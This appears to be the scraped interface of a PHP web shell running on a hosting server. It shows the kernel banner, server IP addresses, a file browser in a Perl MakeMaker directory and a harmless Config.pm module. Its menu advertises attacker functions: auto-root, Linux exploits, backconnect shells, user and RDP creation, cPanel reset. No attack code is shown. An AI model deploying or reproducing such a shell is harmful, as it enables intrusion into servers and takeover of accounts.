Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.190.253.56
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
share /
perl5 /
ExtUtils /
MakeMaker /
[ HOME SHELL ]
Name
Size
Permission
Action
version
[ DIR ]
drwxr-xr-x
Config.pm
588
B
-r--r--r--
FAQ.pod
19.71
KB
-r--r--r--
Locale.pm
13.02
KB
-r--r--r--
Tutorial.pod
5.3
KB
-r--r--r--
version.pm
2.32
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Config.pm
package ExtUtils::MakeMaker::Config; use strict; our $VERSION = '7.38'; $VERSION =~ tr/_//d; use Config (); # Give us an overridable config. our %Config = %Config::Config; sub import { my $caller = caller; no strict 'refs'; ## no critic *{$caller.'::Config'} = \%Config; } 1; =head1 NAME ExtUtils::MakeMaker::Config - Wrapper around Config.pm =head1 SYNOPSIS use ExtUtils::MakeMaker::Config; print $Config{installbin}; # or whatever =head1 DESCRIPTION B<FOR INTERNAL USE ONLY> A very thin wrapper around Config.pm so MakeMaker is easier to test. =cut
Close